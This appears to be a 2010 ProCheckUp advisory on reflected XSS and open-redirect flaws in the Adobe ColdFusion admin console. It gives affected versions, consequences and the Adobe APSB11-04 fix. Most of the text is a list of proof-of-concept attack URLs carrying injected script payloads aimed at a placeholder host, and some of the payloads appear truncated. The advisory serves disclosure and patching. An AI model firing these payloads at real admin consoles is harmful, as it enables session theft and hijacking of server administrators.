http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-08 PR10-08: Various XSS and information disclosure flaws within Adobe ColdFusion administration console Vulnerability found: 17th April 2010 Vendor informed: 19th April 2010 Vulnerability fixed: 8th February 2011 Severity: Medium/High Description: Adobe ColdFusion is an easy to use and very widely adopted Programming language, Procheckup has discovered that the ColdFusion admin console (and various programs within), are vulnerable to reflective XSS attacks. The Admin console is normally accessed using a web browser over port 8500 (though this can be changed) or directly mapped onto a web server directory by proxying cfm extensions. Note: Tested on ColdFusion enterprise version 8.01 running on Windows XP, and ColdFusion 7,8,9 running on Windows 2003 R2 SP2 server and mapped to IIS 6. Defaults were chosen with "server contained installation", and all subcomponents. Versions tested ColdFusion MX7 7,0,0,91690 base patches ColdFusion MX8 8,0,1,195765 base patches ColdFusion MX8 8,0,1,195765 with Hotfix4 ColdFusion MX8 8,0,1,195765 with Hotfix4 and patches from security Bulletin APSB10-11 shf8010001.jar and CFIDE-801.zip ColdFusion 9 9,0,0,251028 base patches - ColdFusion 9 includes a simple list of forbidden tags. So 3081b18fb95=1 Does not work with ColdFusion 7 http://target-domain.foo:8500/CFIDE/administrator/datasources/derbyEmbedded.cfm?dsn=cfartgallery&">=1 http://target-domain.foo:8500/CFIDE/administrator/extensions/corbaedit.cfm?"> http://target-domain.foo:8500/CFIDE/administrator/logviewer/searchlog.cfm?logfile="> http://target-domain.foo:8500/CFIDE/administrator/settings/fonts.cfm?fontPath=555-555-0199@example.com&browsesubmit=Browse+Server&mapping=&5921a">3081b18fb95=1 http://target-domain.foo:8500/CFIDE/administrator/settings/fonts.cfm?browsesubmit=Browse+Server&mapping=&5921a">3081b18fb95=1 http://target-domain.foo:8500/CFIDE/administrator/settings/jvm.cfm?browsesubmit=Browse+Server&jvmArgs=-server+-Dsun.io.useCanonCaches%3dfalse+-XX%3aMaxPermSize%3d192m+-XX%3a%2bUseParallelGC+-Dcoldfusion.rootDir%3d%7bapplication.home%7d%2f..%2f+-Dcoldfusion.libPath%3d%7bapplication.home%7d%2f..%2flib&jdkPath=C%3a%2fColdFusion8%2fruntime%2fjre&minHeap=0&maxHeap=512&12bf2">1fb5988b6d1 http://target-domain.foo:8500/CFIDE/administrator/settings/mappings.cfm?browsesubmit=Browse+Server&mapping=&5921a">3081b18fb95=1 http://target-domain.foo:8500/CFIDE/administrator/settings/version.cfm?browsesubmit=Browse+Server&mapping=&5921a">3081b18fb95=1 Works intermittently, or delayed response. http://target-domain.foo:8500/CFIDE/administrator/analyzer/index.cfm?browsesubmit=Browse+Server&directory=C%3a%5cColdFusion8%5cwwwroot%5cCFIDE%5cadministrator%5canalyzerd590f"style%3d"x:expression(alert(1))" COLDFUSION VERSION 9 – Variants which work with CF9 as do not use the needs to be substituted with a tag not on the match list (this works on IE7 & IE6) http://target-domain.foo/CFIDE/administrator/archives/index.cfm?browsesubmit=Browse+Server&mapping=&5921a">3081b18fb95=1 http://target-domain.foo/CFIDE/administrator/datasources/derbyEmbedded.cfm?dsn=cfartgallery&">=1 http://target-domain.foo/CFIDE/administrator/extensions/corbaedit.cfm?"> http://target-domain.foo/CFIDE/administrator/logviewer/searchlog.cfm?logfile="> http://target-domain.foo/CFIDE/administrator/settings/fonts.cfm?fontPath=555-555-0199@example.com&browsesubmit=Browse+Server&mapping=&5921a"> http://target-domain.foo/CFIDE/administrator/settings/fonts.cfm?browsesubmit=Browse+Server&mapping=&5921a"> http://target-domain.foo/CFIDE/administrator/settings/jvm.cfm?browsesubmit=Browse+Server&jvmArgs=-server+-Dsun.io.useCanonCaches%3dfalse+-XX%3aMaxPermSize%3d192m+-XX%3a%2bUseParallelGC+-Dcoldfusion.rootDir%3d%7bapplication.home%7d%2f..%2f+-Dcoldfusion.libPath%3d%7bapplication.home%7d%2f..%2flib&jdkPath=C%3a%2fColdFusion8%2fruntime%2fjre&minHeap=0&maxHeap=512&12bf2">1 http://target-domain.foo/CFIDE/administrator/settings/mappings.cfm?browsesubmit=Browse+Server&mapping=&5921a">3081b18fb95=1 http://target-domain.foo/CFIDE/administrator/settings/version.cfm?browsesubmit=Browse+Server&mapping=&5921a">3081b18fb95=1 3) Authenticated vanilla XSS attacks. IE7 +Firefox - authenticated http://target-domain.foo:8500/CFIDE/administrator/extensions/appletedit.cfm?method=1&code=1&width=1&applet=1">5d59011273e IE7 - authenticated http://target-domain.foo:8500/CFIDE/administrator/extensions/cfx_cppedit.cfm?PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true IE7 - authenticated – Does not work with ColdFusion 7 http://target-domain.foo:8500/CFIDE/administrator/eventgateway/gatewaytypes.cfm?typename=ActiveMQca235"style%3d"x:expression(alert(1))"6de21ab4628&action=edit Takes a while to come back - authenticated http://target-domain.foo:8500/CFIDE/administrator/settings/clientvariables.cfm?action=edit&store=Registrydb5a1"style%3d"x:expression(alert(1))"8d51e21067f COLDFUSION VERSION 9 – Variants which work with CF9 as do not use the needs to be substituted with a tag not on the match list (this works on IE7 & IE6) http://target-domain.foo/CFIDE/administrator/extensions/appletedit.cfm?method=1&code=1&width=1&applet=1">5d59011273e http://target-domain.foo/CFIDE/administrator/extensions/cfx_cppedit.cfm?PROCEDURE=ProcessTagRequestbaccd%22style%3d%22x:expression%28alert%281%29%29%221dcd653666d&TAGNAME=cfx_&CACHE=on&TreeSubmitApply=true http://target-domain.foo/CFIDE/administrator/eventgateway/gatewaytypes.cfm?typename=ActiveMQca235"style%3d"x:expression(alert(1))"6de21ab4628&action=edit Takes a while to come back http://target-domain.foo/CFIDE/administrator/settings/clientvariables.cfm?action=edit&store=Registrydb5a1"style%3d"x:expression(alert(1))"8d51e21067f 4) Authenticated vanilla XSS fixed in ColdFusion 8 hotfix 4 (works with ColdFusion 8 and ColdFusion 7). http://target-domain.foo:8500/CFIDE/administrator/datasources/index.cfm?locale=enb6f5d"style%3d"x:expression(alert(1))"24ac5d7bc65&VerifyAllDatasources=+Verify+All+Connections+ http://target-domain.foo:8500/CFIDE/administrator/eventgateway/gateways.cfm?gwid=SMS%20Menu%20App%20%2D%20555121268668"style%3d"x:expression(alert(1))"886b9fc22e4&action=edit http://target-domain.foo:8500/CFIDE/administrator/j2eepackaging/editarchive.cfm?locale=en579a7"style%3d"x:expression(alert(1))"df5c8bdd5e9&addarchive=%a0+Add+%a0&archivename=Test+Me Takes a while to come back http://target-domain.foo:8500/CFIDE/administrator/settings/charting.cfm?browsesubmit=Browse+Server&CachePath=C%3a%5cJRun4%5cservers%5ccfusion%5ccfusion-ear%5ccfusion-war%5cWEB-INF%5ccfusion%5ccharting%5ccachef2250"style%3d"x:expression(alert(1))"7d1c33c9139&maxEngines=4&cacheSize=50&cacheType=1 Consequences: An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link to an exposed ColdFusion admin site. Such code would run within the security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: session IDs) to unauthorised third parties. Fix: Apply patch as described in Adobe bulletin apsb11-04 http://www.adobe.com/support/security/bulletins/apsb11-04.html 4) Open redirection - fixed hot fix 4 http://target-domain.foo:8500/CFIDE/administrator/logging/archiveexecute.cfm?logfile=application%2Elog&return=true Set the referer header.. Referer: http://www.procheckup.com References: http://www.procheckup.com/Vulnerabilities.php http://www.adobe.com/support/security/bulletins/apsb11-04.html http://www.securityfocus.com/bid/46273 Fix: Apply patch as described in Adobe bulletin apsb11-04 http://www.adobe.com/support/security/bulletins/apsb11-04.html Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com) Legal: Copyright 2010 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/